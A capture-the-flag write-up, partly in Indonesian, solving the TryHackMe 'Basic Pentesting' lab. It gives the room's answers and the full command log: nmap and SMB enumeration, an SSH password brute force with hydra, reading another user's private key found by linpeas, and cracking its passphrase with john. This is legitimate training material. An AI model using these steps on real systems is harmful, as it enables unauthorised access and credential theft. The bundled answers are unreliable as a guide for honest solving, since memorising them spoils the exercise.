ctf_aria
write up ctf by ariafatah
Project maintained by ariafatah0711 Hosted on GitHub Pages — Theme by mattgraham
Basic Pentesting
- desc: This is a machine that allows you to practise web app hacking and privilege escalation.
- url : https://tryhackme.com/r/room/basicpentestingjt
docs
answer
- Task 1
- development
- jan
- armando
- SSH
- kay
- heresareallystrongpasswordthatfollowsthepasswordpolicy$$
Solve (Visual)
information gathering
- saya melakukan nmap terlebih dahulu
- lalu saya melakukan gobuster untuk mencari directory, disini saya menemuukan path development
- di dalam file tersebut terdapat teks
- nah dari sini terdapat sebuah samba disini saya mencoba melakukan enumeration dengan enum4linux
- disini saya melakukan smbclient dan mengambil file staff.txt
exploit
- disini saya melakukan brute force terhadap user jan
- disini saya menggunakan tool linenum / linpeash untuk mencari cara untuk privescalation dan saya menemukan bahwa si user kay terdapat file id_rsa yang terbuka
post exploit
- jadi saya copy filenya dan saya lakukan bruetforce dengan john
- dan saya login dan berhasil
Solve (Text-Based)
information gathering
: '[+] setup'
ip=10.10.207.200
tun=10.21.78.122
: '[+] nmap'
nmap -sCV -T4 $ip -oN nmap
# Nmap 7.94SVN scan initiated Sat Feb 1 19:47:01 2025 as: /usr/lib/nmap/nmap --privileged -sCV -T4 -oN nmap 10.10.207.200
# Nmap scan report for 10.10.207.200 (10.10.207.200)
# Host is up (0.21s latency).
# Not shown: 994 closed tcp ports (reset)
# PORT STATE SERVICE VERSION
# 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
# | ssh-hostkey:
# | 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
# | 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
# |_ 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
# 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
# |_http-title: Site doesn't have a title (text/html).
# |_http-server-header: Apache/2.4.18 (Ubuntu)
# 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
# 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
# 8009/tcp open ajp13?
# | ajp-methods:
# |_ Supported methods: GET HEAD POST OPTIONS
# 8080/tcp open http-proxy
# |_http-open-proxy: Proxy might be redirecting requests
# |_http-title: Apache Tomcat/9.0.7
# | fingerprint-strings:
# | giop:
# | HTTP/1.1 400
# | Content-Type: text/html;charset=utf-8
# | Content-Language: en
# | Content-Length: 2243
# | Date: Sat, 01 Feb 2025 12:49:52 GMT
# | Connection: close
# | <!doctype html><html lang="en"><head><title>HTTP Status 400
# |_ Request</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><bod
# |_http-favicon: Apache Tomcat
# 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
# SF-Port8080-TCP:V=7.94SVN%I=7%D=2/1%Time=679E1871%P=x86_64-pc-linux-gnu%r(
# SF:giop,95F,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;charset=ut
# SF:f-8\r\nContent-Language:\x20en\r\nContent-Length:\x202243\r\nDate:\x20S
# SF:at,\x2001\x20Feb\x202025\x2012:49:52\x20GMT\r\nConnection:\x20close\r\n
# SF:\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x20Status\
# SF:x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20type=\"text/c
# SF:ss\">h1\x20{font-family:Tahoma,Arial,sans-serif;color:white;background-
# SF:color:#525D76;font-size:22px;}\x20h2\x20{font-family:Tahoma,Arial,sans-
# SF:serif;color:white;background-color:#525D76;font-size:16px;}\x20h3\x20{f
# SF:ont-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76
# SF:;font-size:14px;}\x20body\x20{font-family:Tahoma,Arial,sans-serif;color
# SF::black;background-color:white;}\x20b\x20{font-family:Tahoma,Arial,sans-
# SF:serif;color:white;background-color:#525D76;}\x20p\x20{font-family:Tahom
# SF:a,Arial,sans-serif;background:white;color:black;font-size:12px;}\x20a\x
# SF:20{color:black;}\x20a\.name\x20{color:black;}\x20\.line\x20{height:1px;
# SF:background-color:#525D76;border:none;}</style></head><bod");
# Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
# Host script results:
# |_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
# | smb2-time:
# | date: 2025-02-01T12:49:54
# |_ start_date: N/A
# | smb-os-discovery:
# | OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
# | Computer name: basic2
# | NetBIOS computer name: BASIC2\x00
# | Domain name: \x00
# | FQDN: basic2
# |_ System time: 2025-02-01T07:49:54-05:00
# |_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
# | smb2-security-mode:
# | 3:1:1:
# |_ Message signing enabled but not required
# | smb-security-mode:
# | account_used: guest
# | authentication_level: user
# | challenge_response: supported
# |_ message_signing: disabled (dangerous, but default)
# Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# # Nmap done at Sat Feb 1 19:50:01 2025 -- 1 IP address (1 host up) scanned in 179.81 seconds
: '[+] whatweb'
whatweb $ip
# http://10.10.207.200 [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.10.207.200]
: '[+] Directory Discovery (gobuster, dirsearch, dirbuster(gui))'
gobuster dir -u http://$ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
# /development (Status: 301) [Size: 318] [--> http://10.10.207.200/development/]
: 'enum4linux'
enum4linux -a $ip | tee enum
# Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Feb 1 19:54:45 2025
# =========================================( Target Information )=========================================
# Target ........... 10.10.207.200
# RID Range ........ 500-550,1000-1050
# Username ......... ''
# Password ......... ''
# Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
# ============================( Enumerating Workgroup/Domain on 10.10.207.200 )============================
# [+] Got domain/workgroup name: WORKGROUP
# ================================( Nbtstat Information for 10.10.207.200 )================================
# Looking up status of 10.10.207.200
# BASIC2 <00> - B <ACTIVE> Workstation Service
# BASIC2 <03> - B <ACTIVE> Messenger Service
# BASIC2 <20> - B <ACTIVE> File Server Service
# ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
# WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
# WORKGROUP <1d> - B <ACTIVE> Master Browser
# WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
# MAC Address = 00-00-00-00-00-00
# ===================================( Session Check on 10.10.207.200 )===================================
# [+] Server 10.10.207.200 allows sessions using username '', password ''
# ================================( Getting domain SID for 10.10.207.200 )================================
# Domain Name: WORKGROUP
# Domain Sid: (NULL SID)
# [+] Can't determine if host is part of domain or part of a workgroup
# ===================================( OS information on 10.10.207.200 )===================================
# [E] Can't get OS info with smbclient
# [+] Got OS info for 10.10.207.200 from srvinfo:
# BASIC2 Wk Sv PrQ Unx NT SNT Samba Server 4.3.11-Ubuntu
# platform_id : 500
# os version : 6.1
# server type : 0x809a03
# =======================================( Users on 10.10.207.200 )=======================================
# Use of uninitialized value $users in print at ./enum4linux.pl line 972.
# Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975.
# Use of uninitialized value $users in print at ./enum4linux.pl line 986.
# Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988.
# =================================( Share Enumeration on 10.10.207.200 )=================================
# Sharename Type Comment
# --------- ---- -------
# Anonymous Disk
# IPC$ IPC IPC Service (Samba Server 4.3.11-Ubuntu)
# Reconnecting with SMB1 for workgroup listing.
# Server Comment
# --------- -------
# Workgroup Master
# --------- -------
# WORKGROUP BASIC2
# [+] Attempting to map shares on 10.10.207.200
# //10.10.207.200/Anonymous Mapping: OK Listing: OK Writing: N/A
# [E] Can't understand response:
# NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
# //10.10.207.200/IPC$ Mapping: N/A Listing: N/A Writing: N/A
# ============================( Password Policy Information for 10.10.207.200 )============================
# [+] Attaching to 10.10.207.200 using a NULL share
# [+] Trying protocol 139/SMB...
# [+] Found domain(s):
# [+] BASIC2
# [+] Builtin
# [+] Password Info for Domain: BASIC2
# [+] Minimum password length: 5
# [+] Password history length: None
# [+] Maximum password age: 37 days 6 hours 21 minutes
# [+] Password Complexity Flags: 000000
# [+] Domain Refuse Password Change: 0
# [+] Domain Password Store Cleartext: 0
# [+] Domain Password Lockout Admins: 0
# [+] Domain Password No Clear Change: 0
# [+] Domain Password No Anon Change: 0
# [+] Domain Password Complex: 0
# [+] Minimum password age: None
# [+] Reset Account Lockout Counter: 30 minutes
# [+] Locked Account Duration: 30 minutes
# [+] Account Lockout Threshold: None
# [+] Forced Log off Time: 37 days 6 hours 21 minutes
# [+] Retieved partial password policy with rpcclient:
# Password Complexity: Disabled
# Minimum Password Length: 5
# =======================================( Groups on 10.10.207.200 )=======================================
# [+] Getting builtin groups:
# [+] Getting builtin group memberships:
# [+] Getting local groups:
# [+] Getting local group memberships:
# [+] Getting domain groups:
# [+] Getting domain group memberships:
# ==================( Users on 10.10.207.200 via RID cycling (RIDS: 500-550,1000-1050) )==================
# [I] Found new SID:
# S-1-22-1
# [I] Found new SID:
# S-1-5-32
# [I] Found new SID:
# S-1-5-32
# [I] Found new SID:
# S-1-5-32
# [I] Found new SID:
# S-1-5-32
# [+] Enumerating users using SID S-1-22-1 and logon username '', password ''
# S-1-22-1-1000 Unix User\kay (Local User)
# S-1-22-1-1001 Unix User\jan (Local User)
: 'samba'
smbclient //$ip/Anonymous
> get staff.txt
cat staff.txt
# Announcement to staff:
# PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
# this is how mistakes happen. (This means you too, Jan!)
# -Kay
exploit
: 'hydra'
hydra -l jan -P /usr/share/wordlists/rockyou.txt $ip ssh -t 64hydra -l jan -P /usr/share/wordlists/rockyou.txt $ip ssh -t 6
# [22][ssh] host: 10.10.207.200 login: jan password: armando
: 'linenum'
/linenum.sh
./linpeas.sh
# ╔══════════╣ Analyzing SSH Files (limit 70)
# -rw-r--r-- 1 kay kay 3326 Apr 19 2018 /home/kay/.ssh/id_rsa
cat /home/kay/.ssh/id_rsa
# -----BEGIN RSA PRIVATE KEY-----
# Proc-Type: 4,ENCRYPTED
# DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75
# IoNb/J0q2Pd56EZ23oAaJxLvhuSZ1crRr4ONGUAnKcRxg3+9vn6xcujpzUDuUtlZ
# ...
# 3Jt1/ZW3XCb76R75sG5h6Q4N8gu5c/M0cdq16H9MHwpdin9OZTqO2zNxFvpuXthY
# -----END RSA PRIVATE KEY-----
post exploit
: 'john'
ssh2john id_rsa > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
# beeswax (id_rsa)
su kay
# Password:
# su: Authentication failure
ssh -i .ssh/id_rsa kay@localhost
# pass: beeswax
cat pass.bak
# heresareallystrongpasswordthatfollowsthepasswordpolicy$$